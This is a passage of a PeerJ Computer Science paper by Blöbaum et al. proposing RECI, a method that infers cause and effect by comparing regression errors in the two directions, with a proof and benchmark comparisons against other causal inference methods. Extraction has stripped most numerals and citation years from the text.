sense, appropriate independence assumptions between pc and pe|c imply that pe,c has a simpler description in causal direction than in anticausal direction. an approximation of ( ) is given by the slope algorithm in the work by marx & vreeken ( ), where regression is utilized to estimate and compare the approximated kolmogorov complexities. for this, a logarithmic error is used, which is motivated by a minimum description length perspective. another work that is inspired by the independence assumption is the information-geometric approach for causal inference (igci) (janzing et al., ). igci provides a method to infer the causal direction in deterministic nonlinear relationships subject to a certain independence condition between the slope of the function and the distribution of the cause. a related but different independence assumption is also used by a technique called unsupervised inverse regression (cure) (sgouritsa et al., ), where the idea is to estimate a prediction model of both possible causal directions in an unsupervised manner, i.e., only the input data is used for the training of the prediction models. with respect to the above independence assumption, the effect data may contain information about the relation between cause and effect that can be employed for predicting the cause from the effect, but the cause data alone does not contain any information that helps the prediction of the effect from the cause (as hypothesized in schölkopf et al. ( )). accordingly, the unsupervised regression model in the true causal direction should be less accurate than the prediction model in the wrong causal direction. for our approach, we address the causal inference problem by exploiting an asymmetry in the mean-squared error (mse) of predicting the cause from the effect and the effect from the cause, respectively, and show, that under appropriate assumptions and in the regime of almost deterministic relations, the prediction error is smaller in causal direction. a preliminary version of this idea can be found in blöbaum, washio & shimizu ( ) and blöbaum, shimizu & washio ( ) but in these works the analysis is based on a simple heuristic assuming that the regression of y on x and the regression of x on y yield functions that are inverse to each other, which holds approximately in the limit of small blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. or ? figure an illustration of the goal of our proposed method. it aims to identify the causal dag of two variables, where either x causes y or y causes x. full-size doi: . /peerjcs. /fig- noise. moreover, the analysis is also based on the assumption of an additive noise model in causal direction and on having prior knowledge about the functional relation between x and y , which makes it impractical for generic causal inference problems. in this work, we aim to generalize and extend the two aforementioned works in several ways: ( ) we explicitly allow a dependency between cause and noise. ( ) we give a proper mathematical proof of the theory that justifies the method subject to clear formal assumptions. ( ) we perform extensive evaluations for the application in causal inference and compare it with various related approaches. the theorem stated in this work might also be of interest for general statistical purposes. a briefer version of this work with less extensive experiments, lesser details and without detailed proofs can be found in blöbaum et al. ( ). this paper is structured as follows: in ‘preliminaries’, we define the problem setting and introduce the used notations and assumptions, which are necessary for the main theorem of this work stated in ‘theory’. an algorithm that utilizes this theorem is proposed in algorithm and evaluated in various artificial and real-world data sets in ‘experiments’. preliminaries in the following, we introduce the preliminary problem setting, notations and assumptions. problem setting and notation in this work, we use the framework of structural causal models (pearl, ) with the goal of correctly identifying cause and effect variables of given observations from x and y . as illustrated in fig. , this can be described by the problem of identifying whether the causal dag of x →y or x ←y is true. throughout this paper, a capital letter denotes a random variable and a lowercase letter denotes values attained by the random variable. variables x and y are assumed to be real-valued and to have a joint probability density (with respect to the lebesgue measure), denoted by px,y . by slightly abusing terminology, we will not further distinguish between a distribution and its density since the lebesgue measure as a reference is implicitly understood. the notations px , py , and py |x are used for the corresponding marginal and conditional densities, respectively. the derivative of a function f is denoted by f ′. general idea as mentioned before, the general idea of our approach is to simply compare the mse of regressing y on x and the mse of regressing x on y . if we denote cause and effect blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. note that although the form of ( ) is similar to that of anm, the core assumption of anm is an independence between cause and noise, which we do not need in our approach. therefore, we assume the general structural equation defined in ( ), whereas anm assumes a more restrictive structural equation of the form e =ζ(c)+ñ with cyñ . by c,e ∈{x,y}, respectively, our approach explicitly reads as follows. let φ denote the function that minimizes the expected least squares error when predicting e from c, which implies that φ is given by the conditional expectation φ(c)=e[e|c]. likewise, let ψ be the minimizer of the least squares error for predicting c from e, that is, ψ(e)=e[c|e]. then we will postulate assumptions that imply e[(e−φ(c)) ]≤e[(c−ψ(e)) ] ( ) in the regime of almost deterministic relations. this conclusion certainly relies on some kind of scaling convention. for our theoretical results we will assume that both x and y attain values between and . however, in some applications, we will also scale x and y to unit variance to deal with unbounded variables. equation ( ) can be rewritten in terms of conditional variance as e[var[e|c]]≤e[var[c|e]]. assumptions first, recall that we assume throughout the paper that either x is the cause of y or vice versa in an unconfounded sense, i.e., there is no common cause. therefore, the general structural equation is defined as e =ζ(c,ñ), ( ) where cyñ . for our analysis, we first define a function φ to be the conditional expectation of the effect given the cause, i.e., φ(c) :=e[e|c] and, accordingly, we define a noise variable n as the residual n :=e−φ(c). ( ) note that ( ) implies that e[n|c]= . the function φ is further specified below. then, to study the limit of an almost deterministic relation in a mathematically precise way, we consider a family of effect variables eα by eα :=φ(c)+αn, ( ) where α∈r+ is a parameter controlling the noise level and n is a noise variable that has some (upper bounded) joint density pn,c with c. note that n here does not need to be statistically independent of c (in contrast to anms), which allows the noise to be non-additive. therefore, ( ) does not, a priori, restrict the set of possible causal relations, because for any pair (c,e) one can always define the noise n as ( ) and thus obtain eα= =e for any arbitrary function φ . for this work, we make use of the following assumptions: . invertible function: φ is a strictly monotonically increasing two times differentiable function φ : [ , ]→[ , ]. for simplicity, we assume that φ is monotonically increasing with φ( )= and φ( )= (similar results for monotonically decreasing functions follow by reflection e → −e). we also assume that φ− ′ is bounded. blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note, however, that the assignment ( ) is not a structural equation in a strict sense, because then c and n would need to be statistically independent. . compact supports: the distribution of c has compact support. without loss of generality, we assume that and are, respectively, the smallest and the largest values attained by c. we further assume that the distribution of n has compact support and that there exist values n+ > > n− such that for any c, [n−,n+] is the smallest interval containing the support of pn|c. this ensures that we know [αn−, +αn+] is the smallest interval containing the support of peα. then the shifted and rescaled variable ẽα := +αn+−αn− (eα−αn−) ( ) attains and as minimum and maximum values and thus is equally scaled as c. . unit noise variance: the expected conditional noise variance is e[var[n|c]]= without loss of generality, seeing that we can scale the noise arbitrary by the parameter α and we are only interested in the limit α→ . . independence postulate: while the above assumptions are just technical, we now state the essential assumption that generates the asymmetry between cause and effect. to this end, we consider the unit interval [ , ] as probability space with uniform distribution as probability measure. the functions c →φ′(c) and c →var[n|c]pc(c) define random variables on this space, which we postulate to be uncorrelated, formally stated as cov[φ′,var[n|c]pc]= . ( ) more explicitly, ( ) reads:∫ φ ′(c)var[n|c]pc(c)dc− ∫ φ ′(c)dc ∫ var[n|c]pc(c)dc = . ( ) the justification of ( ) is not obvious at all. for the special case where the conditional variance var[n|c] is a constant in c (e.g., for anms), ( ) reduces to cov[φ′,pc]= , ( ) which is an independence condition for deterministic relations stated in schölkopf et al. ( ). conditions of similar type as ( ) have been discussed and justified in janzing et al. ( ). they are based on the idea that φ contains no information about pc. this, in turn, relies on the idea that the conditional pe|c contains no information about pc. to discuss the justification of ( ), observe first that it cannot be justified as stating some kind of ‘independence’ between pc and pe|c. to see this, note that ( ) states an uncorrelatedness of the two functions c →φ′(c) and c →var[n|c]pc(c). while φ′ depends only on the conditional pe|c and not on pc, the second function depends on both pc|e and pe, since var[n|c] is a property of pe|c. nevertheless, to justify ( ) we assume that the function φ represents a law of nature that persists when pc and n change due to changing background conditions. from this perspective, it becomes unlikely that they are related to the background condition at hand. this idea follows the general spirit of ‘modularity and autonomy’ in structural equation modeling, that some structural equations may remain unchanged when other parts of a system change (see chapter in peters, janzing & schölkopf ( ) for a literature review) . to further justify ( ), one could think of a scenario where someone changes φ independently of pn,c, which then results in vanishing correlations. typically, this assumption would be violated if φ is adjusted to pn,c or vice versa. this could happen due to an intelligent design by, for instance, first blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. observing pn,c and then defining φ or due to a long adaption process in nature (see janzing et al. ( ) for further discussions of possible violations in a deterministic setting). a simple implication of ( ) reads∫ φ ′(c)var[n|c]pc(c)dc = , ( ) due to ∫ φ ′(c)dc = and ∫ var[n|c]pc(c)dc =e[var[n|c]]= . in the following, the term independence postulate is used to refer to the aforementioned postulate and the term independence to a statistical independence, which should generally become clear from the context. theory as introduced in ‘general idea’, we aim to exploit an inequality of the expected prediction errors in terms of e[var[e|c]]≤e[var[c|e]] to infer the causal direction. in order to conclude this inequality and, thus, to justify an application to causal inference, we must restrict our analysis to the case where the noise variance is sufficiently small, since a more general statement is not possible under the aforementioned assumptions. the analysis can be formalized by the ratio of the expectations of the conditional variances in the limit α→ . we will then show lim α→ e[var[c|ẽα]] e[var[ẽα|c]] ≥ . error asymmetry theorem for our main theorem, we first need an important lemma: lemma (limit of variance ratio) let the assumptions – in ‘assumptions’ hold. then the following limit holds: lim α→ e[var[c|ẽα]] e[var[ẽα|c]] = ∫ φ′(c) var[n|c]pc(c)dc ( ) proof: we first give some reminders of the definition of the conditional variance and some properties. for two random variables z and q the conditional variance of z, given q is defined by var[z|q] :=e[(z−e[z|q]) |q], while var[z|q] is the random variable attaining the value var[z|q] when q attains the value q. its expectation reads e[var[z|q]] := ∫ var[z|q]pq(q)dq. for any a∈r, we have var [ z a ∣∣q]= var[z|q] a . blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for any function h, we have var[h(q)+z|q]=var[z|q], which implies var[h(q)|q]= . moreover, we have var[z|h(q)]=var[z|q], if h is invertible. to begin the main part of the proof, we first observe e[var[eα|c]]=e[var[φ(c)+αn|c]]=α e[var[n|c]]︸ ︷︷ ︸ = (assumpt. )) =α . ( ) moreover, one easily verifies that lim α→ e[var[c|ẽα]] e[var[ẽα|c]] = lim α→ e[var[c|eα]] e[var[eα|c]] , ( ) due to ( ) provided that these limits exist. combining eqs. ( ) and ( ) yields lim α→ e[var[c|ẽα]] e[var[ẽα|c]] = lim α→ e[var[c|eα]] α = lim α→ e [ var [ c α ∣∣eα]]. ( ) now, we can rewrite ( ) as lim α→ e [ var [ c α ∣∣eα]]= lim α→ e [ var [ φ− (eα−αn) α ∣∣eα]] = lim α→ ∫ φ( )+αn+ φ( )+αn− var [ φ− (e−αn) α ∣∣e]peα(e)de = lim α→ ∫ φ( ) φ( ) var [ φ− (e−αn) α ∣∣e]peα(e)de. ( ) in the latter step, αn+ and −αn− vanishes in the limit seeing that the function e →var [ φ − (e−αn)/α ∣∣e]peα(e) is uniformly bounded in α. this is firstly, because φ− attains only values in [ , ], and hence the variance is bounded by . secondly, peα(e) is uniformly bounded due to peα(e)= ∫ n+ n− pφ(c),n (e−αn,n)dn= ∫ n+ n− pc,n (φ − (e−αn),n)φ− ′ (e−αn)dn ≤‖φ − ′ ‖∞‖pc,n‖∞(n+−n−). accordingly, the bounded convergence theorem states lim α→ ∫ φ( ) φ( ) var [ φ− (e−αn) α ∣∣e]peα(e)de=∫ φ( ) φ( ) lim α→ ( var [ φ− (e−αn) α ∣∣e]peα(e))de. to compute the limit of var [ φ− (e−αn) α ∣∣e], blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we use taylor’s theorem to obtain φ − (e−αn)=φ− (e)−αnφ− ′ (e)− α n φ− ′′ (e (n,e)) , ( ) where e (n,e) is a real number in the interval (e−αn,e). since ( ) holds for every n∈[− e α , −e α ] (note that φ and φ− are bijections of [ , ], thus e−αn lies in [ , ]) it also holds for the random variable n if e (n,e) is replaced with the random variable e (n,e) (here, we have implicitly assumed that the map n →e (n,e) is measurable). therefore, we see that lim α→ var [ φ− (e−αn) α ∣∣e]= lim α→ var [ −nφ− ′ (e)− αn φ− ′′ (e (n,e)) ∣∣e ] =φ − ′(e) var[n|e]. ( ) moreover, we have lim α→ peα(e)=pe (e). ( ) inserting eqs. ( ) and ( ) into ( ) yields lim α→ e [ var [ c α ∣∣e ]]=∫ φ( ) φ( ) φ − ′(e) var[n|e]pe (e)de = ∫ φ − ′(φ(c)) var[n|φ(c)]pc(c)dc = ∫ φ′(c) var[n|c]pc(c)dc, where the second equality is a variable substitution using the deterministic relation e =φ(c) (which implies pe (φ(c))=pc(c)/φ ′(c) or, equivalently, the simple symbolic equation pe (e)de=pc(c)dc). this completes the proof due to ( ). � while the formal proof is a bit technical, the intuition behind this idea is quite simple: just think of the scatter plot of an almost deterministic relation as a thick line. then var[eα|c] and var[c|eα =φ(c)] are roughly the squared widths of the line at some point (c,φ(c)) measured in vertical and horizontal direction, respectively. the quotient of the widths in vertical and horizontal direction is then given by the slope. this intuition yields the following approximate identity for small α: var[c|ẽα=φ(c)]≈ (φ′(c)) var[ẽα|c =c]=α (φ′(c)) var[n|c]. ( ) taking the expectation of ( ) over c and recalling that assumption implies e[var[ẽα|c]]=α e[var[n|c]]=α already yields ( ). with the help of lemma , we can now formulate the core theorem of this paper: theorem (error asymmetry) let the assumptions – in ‘assumptions’ hold. then the following limit always holds lim α→ e[var[c|ẽα]] e[var[ẽα|c]] ≥ , with equality only if the function stated in assumption is linear. blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. proof: we first recall that lemma states lim α→ e[var[c|ẽα]] e[var[ẽα|c]] = ∫ φ′(c) var[n|c]pc(c)dc. we then have∫ φ′(c) var[n|c]pc(c)dc = ∫ φ′(c) var[n|c]pc(c)dc · ∫ var[n|c]pc(c)dc︸ ︷︷ ︸ = (assumpt. ) = ∫ √( φ′(c) ) var[n|c] pc(c)dc · ∫ √ var[n|c] pc(c)dc ≥  ∫ √( φ′(c) ) var[n|c] √ var[n|c]pc(c)dc   = (∫ φ′(c) var[n|c]pc(c)dc ) , ( ) where the inequality is just the cauchy schwarz inequality applied to the bilinear form f ,g → ∫ f (c)g(c)pc(c)dc for the space of functions f for which ∫ f (c)pc(c)dc exists. note that if φ is linear, ( ) becomes , since φ′= according to assumpt. . we can make a statement about ( ) in a similar way by using ( ) implied by the independence postulate and using cauchy schwarz:∫ φ′(c) var[n|c]pc(c)dc = ∫ φ′(c) var[n|c]pc(c)dc · ∫ φ ′(c)var[n|c]pc(c)dc︸ ︷︷ ︸ = ( ) = ∫ √ φ′(c) var[n|c] pc(c)dc · ∫ √ φ′(c)var[n|c] pc(c)dc ≥ (∫ √ φ′(c) var[n|c] √ φ′(c)var[n|c]pc(c)dc ) =   ∫ var[n|c]pc(c)dc︸ ︷︷ ︸ = (assumpt. )   = . ( ) combining eqs. ( ) and ( ) with lemma completes the proof. � blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. remark theorem states that the inequality holds for all values of α smaller than a certain finite threshold. whether this threshold is small or whether the asymmetry with respect to regression errors already occurs for large noise cannot be concluded from the theoretical insights. presumably, this depends on the features of φ, pc, pn|c in a complicated way. however, the experiments in ‘experiments’ suggest that the asymmetry often appears even for realistic noise levels. if the function φ is non-invertible, there is an information loss in anticausal direction, since multiple possible values can be assigned to the same input. therefore, we can expect that the error difference becomes even higher in these cases, which is supported by the experiments in ‘simulated cause–effect pairs with strong dependent noise’. algorithm a causal inference algorithm that exploits theorem can be formulated in a straightforward manner. given observations x,y sampled from a joint distribution px,y , the key idea is to fit regression models in both possible directions and compare the mse. we call this approach regression error based causal inference (reci) and summarize the algorithm in algorithm . although estimating the conditional expectations e[y |x] and e[x|y] by regression is a standard task in machine learning, we should emphasize that the usual issues of over- and underfitting are critical for our purpose (like for methods based on anms or pnls), because they under- or overestimate the noise levels. it may, however, happen that the method even benefits from underfitting: if there is a simple regression model in causal direction that fits the data quite well, but in anticausal relation the conditional expectation becomes more complex, a regression model with underfitting increases the error even more for the anticausal direction than for the causal direction. algorithm the proposed causal inference algorithm. function reci(x, y ) fx and y are the observed data. (x,y )←rescaledata(x,y ) f ←fitmodel(x,y ) ffit regression model f : x →y g ←fitmodel(y,x) ffit regression model g : y →x msey |x ←meansquarederror(f ,x,y ) msex|y ←meansquarederror(g,y,x) if msey |x <msex|y then return x causes y else if msex|y <msey |x then return y causes x else return no decision end if end function blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this speculative remark is related to ( ) and somehow supported by our experiments, where we observed that simple models performed better than complex models, even though they probably did not represent the true conditional expectation. also, an accurate estimation of the mse with respect to the regression model and appropriate preprocessing of the data, such as removing isolated points in low-density regions, might improve the performance. while algorithm only rejects a decision if the error is equal, one could think about utilizing the error difference as a rejection criteria of a decision. for instance, if the error difference is smaller than a certain threshold, the algorithm returns ’no decision’. this idea is further evaluated in ‘error ratio as rejection criterion’. experiments in this section, we compare our algorithm with five different related methods for inferring the causal direction in various artificially generated and observed real-world data sets. in each evaluation, observations of two variables were given and the goal was to correctly identify cause and effect variable. causal inference methods for comparison in the following, we briefly discuss and compare the causal inference methods which we used for the evaluations. lingam. the model assumptions of lingam (shimizu et al., ) are e =βc+n, where β∈r, cyn and n is non-gaussian. while lingam is especially suitable for linear functional relationships with non-gaussian noise, it performs poorly if these assumptions are violated. the computational cost is, however, relatively low. for the experiments, we used a state-of-the-art implementation of lingam that utilizes an entropy based method for calculating the likelihood ratios of the possible causal directions, instead of an independent component analysis based algorithm as in the original version (hyvärinen & smith, ). for this, eq. ( ) in hyvärinen & smith ( ) is used in order to estimate the likelihood ratio eq. ( ) in hyvärinen & smith ( ). anm. the anm (hoyer et al., ) approach assumes that e = f (c)+n, where f is nonlinear and cyn . an asymmetry between cause and effect is achieved by the assumption of an independence between cause and residual. therefore, this method requires fitting a regression function and performing an additional evaluation of the relation between input and residual, which lead to a high computational cost. note that the choice of the evaluation method is crucial for the performance. we used an implementation provided by mooij et al. ( ), which uses a gaussian process regression for the prediction and provides different methods for the evaluation blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the causal direction. for the experiments, we chose different evaluation methods; hsic for statistical independence tests, an entropy estimator for the estimation of the mutual information between input and residuals (denoted as ent) and a bayesian model comparison that assumes gaussianity (denoted as fn). implementation details and parameters can be found in table of mooij et al. ( ). pnl. post non-linear models (zhang & hyvärinen, ) are a generalization of anms. here, it is assumed that e =g(f (c)+n), where g is nonlinear and cyn . due to the additional nonlinearity coming from g, this allows a non-additive influence of the noise as in contrast to an anm. for inferring the causal direction, the idea remains roughly the same; fit a pnl in both possible directions and check for independence between input and disturbance. however, the disturbance here is different from the regression residual and fitting a pnl model is a significantly harder problem than fitting an anm. in the experiments, we used an implementation provided by the authors zhang & hyvärinen ( ), where a constrained nonlinear independent component analysis is utilized for estimating the disturbances and hsic for statistical independence tests. igci. the igci (janzing et al., ) approach is able to determine the causal relationship in a deterministic setting e = f (c), under the ‘independence assumption’ cov[log f ′,pc]= , i.e., the (logarithmic) slope of the function and the cause distribution are uncorrelated. the causal direction can then be inferred if the kullback leibler divergence between a reference measure and px is bigger or smaller than the kullback leibler divergence between the same reference measure and py , respectively. the corresponding algorithm has been applied to noisy causal relations with partial success (and some heuristic justifications (janzing et al., )), but generalizations of igci for non-deterministic relations are actually not known and we consider assumption in ‘assumptions’ as first step towards a possibly more general formulation. the computational cost depends on the utilized method for estimating the information criterion, but is generally low. therefore, igci is the fastest of the methods. for the experiments, we also used an implementation provided by mooij et al. ( ), where we always tested all possible combinations of reference measures and information estimators. these combinations are denoted as igci-ij, where i and j indicate: • i=u: uniform reference measure (normalizing x and y ) • i=g: gaussian reference measure (standardizing x and y ) • j= : entropy estimator using eq. ( ) in daniušis et al. ( ) • j= : integral approximation of eq. ( ) in daniušis et al. ( ) • j= : integral approximation of eq. ( ) in mooij et al. ( ) blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cure. cure (sgouritsa et al., ) is based on the idea that an unsupervised regression of e on c by only using information from pc performs worse than an unsupervised regression of c on e by only using information from pe. cure implements this idea in a bayesian way via a modified gaussian process regression. however, since cure requires the generation of markov-chain-monte-carlo (mcmc) samples, the biggest drawback is a very high computational cost. an implementation of cure by the authors has been provided for our experiments. here, we used similar settings as described in section . of sgouritsa et al. ( ), where data samples were used and mcmc samples were generated. the number of internal repetitions depends on the experimental setting. slope. the slope approach by marx & vreeken ( ) is essentially motivated by ( ) and compares an estimation of (k(px)+k(py |x))/(k(px)+k(py )) with an estimation of (k(py )+k(px|y ))/(k(px)+k(py )) based on the minimum description length principle (rissanen, ). this approach uses a global and multiple local regression models to fit the data, where the description length of the fitted regression models and the description length of the error with respect to the data can be used to approximate k(py |x) and k(px|y ), respectively. seeing that multiple regression models need to be fit depending on the structure of the data, the computational costs can vary between data sets. for our experiments, we used the implementation provided by the authors with the same parameters as used in their experiments with real-world data. reci. our approach addresses non-deterministic nonlinear relations and, in particular, allows a dependency between cause and noise. since we only require the fitting of a least-squares solution in both possible causal directions, reci can be easily implemented. it does not rely on any independence tests and has, depending on the regression model and implementation details, a low computational cost. in the experiments, we have always used the same class of regression function for the causal and anticausal direction to compare the errors, but performed multiple experiments with different function classes. for each evaluation, we randomly split the data into training and test data, where we tried different ratios and selected the best performing model on the test data. the used percentage of training data were %, % or %, where the remaining data served as test data. in each run, we only randomly split the data once. the utilized regression models were: • a logistic function (log) of the form a+(b−a)/( +exp(c ·(d−x))) • shifted monomial functions (mon) of the form axn+b with n∈[ , ] • polynomial functions (poly) of the form ∑k i= aix i with k∈[ , ] • support vector regression (svr) with a linear kernel • neural networks (nn) with different numbers of hidden neurons: , , , , - , - , where ’-’ indicates two hidden layers the logistic and monomial functions cover rather simple regression models, which are probably not able to capture the true function φ in most cases. on the other hand, support vector regression and neural networks should be complex enough to capture φ. blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the polynomial functions are rather simple too, but more flexible than the logistic and monomial functions. we used the standard matlab implementation of these methods and have always chosen the default parameters, where the parameters of log, mon and poly were fitted by minimizing the least-squares error. during the experiments, we observed that the mse varied a lot in many data sets due to relatively small sample sizes and the random selection of training and test data. therefore, we averaged the mse over all performed runs within the same data set first before comparing them, seeing that this should give more accurate estimations of e[var[y |x]] and e[var[x|y]] with respect to the class of the regression function. although the choice of the function class for each data set is presumably a typical model selection problem, we did not optimize the choice for each data set individually. therefore, we only summarize the results of the best performing classes with respect to the experimental setup in the following. the estimated mse in each data set were averaged over all performed runs. a detailed overview of all results, including the performances and standard deviations of all function classes when estimating the mse in single and multiple runs, can be found in the supplements. for the normalization of the data we used ĉ := c−min(c) max(c)−min(c) ê := e−min(e) max(e)−min(e) and for the standardization we used ĉ := c−e[c] √ var[c] ê := e−e[e] √ var[e] . general remark. each evaluation was performed in the original data sets and in preprocessed versions where isolated points (low-density points) were removed. for the latter, we used the implementation and parameters from sgouritsa et al. ( ), where a kernel density estimator with a gaussian kernel is utilized to sort the data points according to their estimated densities. then, data points with a density below a certain threshold ( . in our experiments) are removed from the data set. in this way, outliers should have a smaller impact on the performance. it also shows how sensitive each approach is to outliers. however, removing outliers might lead to an underestimation of the noise in a heavy tail noise distribution and is, therefore, not always the best choice as a preprocessing step. note that cure per default uses this preprocessing step, also in the original data. in all evaluations, we forced a decision by the algorithms, where in case of anm the direction with the highest score of the independence test was taken. except for cure, we averaged the performances of each method over runs, where we uniformly sampled data points for anm and svr if the data set contains more than data points. for cure, we only performed four internal repetitions in the artificial blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note, however, that adding noise to the cause (as it is done here) can also be considered as a kind of confounding. actually, c′ is the cause of e in the below generating model, while the noisy version c is not the cause of e. accordingly, c′ is the hidden common cause of c and e. here we refer to the scenario as an unconfounded case with measurement noise as in mooij et al. ( ). and eight internal repetitions in the real-world data sets due to the high computational cost. as performance measure, we consider the accuracy of correctly identifying the true causal direction. therefore, the accuracy is calculated according to accuracy= ∑m m= wmδd̂m,dm∑m m= wm , ( ) where m is the number of data sets, wm the weight of data set m, dm the correct causal direction and d̂m the inferred causal direction of the corresponding method. note that we consider wm= for all artificial data sets, while we use different weights for the real-world data sets. since we use all data points for slope, igci and lingam, these methods have a consistent performance over all runs. an overview of all utilized data sets with their corresponding number of cause–effect pairs and data samples can be found in table in the supplements. artificial data for experiments with artificial data, we performed evaluations with simulated cause–effect pairs generated for a benchmark comparison in mooij et al. ( ). further, we generated additional pairs with linear, nonlinear invertible and nonlinear non-invertible functions where input and noise are strongly dependent. simulated benchmark cause–effect pairs the work of mooij et al. ( ) provides simulated cause–effect pairs with randomly generated distributions and functional relationships under different conditions. as pointed out by mooij et al. ( ), the scatter plots of these simulated data look similar to those of real-world data. we took the same data sets as used in mooij et al. ( ) and extend the reported results with an evaluation with slope, cure, lingam, reci and further provide results in the preprocessed data. the data sets are categorized into four different categories: • sim: pairs without confounders. the results are shown in figs. a– b • sim-c: a similar scenario as sim, but with one additional confounder. the results are shown in figs. c– d • sim-ln: pairs with low noise level without confounder. the results are shown in figs. a- b • sim-g: pairs where the distributions of c and n are almost gaussian without confounder. the results are shown in figs. c– d. the general form of the data generation process without confounder but with measurement noise is c′∼pc,n ∼pn nc ∼n( ,σc),ne ∼n( ,σe) c =c′+nc e = fe(c ′ ,n)+ne blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y (a) original sim (b) preprocessed sim (c) original sim-c (d) preprocessed sim-c figure evaluation results of all methods in the sim and sim-c data sets. (a) and (c) show the results of the evaluations in the original data and (b) and (d) the results in the preprocessed versions where low- density points were removed. full-size doi: . /peerjcs. /fig- and with confounder c′∼pc,n ∼pn,z ∼pz c′′= fc(c ′ ,z) nc ∼n( ,σc),ne ∼n( ,σe) c =c′′+nc e = fe(c ′′ ,z,n)+ne, where nc,ne represent independent observational gaussian noise and the variances σc andσe are chosen randomly with respect to the setting. note that only ne is gaussian, while the regression residual is non-gaussian due to the nonlinearity of fe and non-gaussianity of n,z. thus, the noise in sim, sim-c and sim-g is non-gaussian. more details can be found in appendix c of mooij et al. ( ). blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y (a) original sim-ln (c) original sim-g (b) preprocessed sim-ln (d) preprocessed sim-g figure evaluation results of all methods in the sim-ln and sim-g data sets. (a) and (c) show the re- sults of the evaluations in the original data and (b) and (d) the results in the preprocessed versions where low-density points were removed. full-size doi: . /peerjcs. /fig- generally, anm performs the best in all data sets. however, the difference between anm and reci, depending on the regression model, becomes smaller in the preprocessed data where isolated points were removed. according to the observed performances, removing these points seems to often improve the accuracy of reci, but decrease the accuracy of anm. in case of the preprocessed sim-g data sets, the accuracy of reci is decreased seeing that in these nearly gaussian data the removal of low-density points leads to an underestimation of the noise distribution. in all data sets, except for sim-g, reci always outperforms slope, igci, cure and lingam if a simple logistic or polynomial function is utilized for the regression. however, in the sim-g data set, our approach performs comparably poor, which could be explained by the violation of the assumption of a compact support. in this nearly gaussian setting, igci performs the best with a gaussian reference measure. however, we also evaluated reci with standardized data in the sim-g data sets, which is equivalent to a gaussian blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. reference measure for igci. a summary of the results can be found in figures (c)– (d) in the supplements and more detailed results in table and table in the supplements. these results are significantly better than normalizing the data in this case. however, although our theorem only justifies a normalization, a different scaling, such as standardization, might be a reasonable alternative. even though theorem does not exclude cases of a high noise level, it makes a clear statement about low noise level. therefore, as expected, reci performs the best in sim-ln, where the noise level is low. in all cases, lingam performs very poorly due to the violations of its core assumptions. surprisingly, although pnl is a generalization of anm, we found that pnl performs generally worse than anm, but better than slope, cure and lingam. anm and reci require a least-squares regression, but anm additionally depends on an independence test, which can have a high computational cost and a big influence on the performance. therefore, even though reci does not outperform anm, it represents a competitive alternative with a lower computational cost, depending on the regression model and mse estimation. also, seeing that reci explicitly allows both cases, 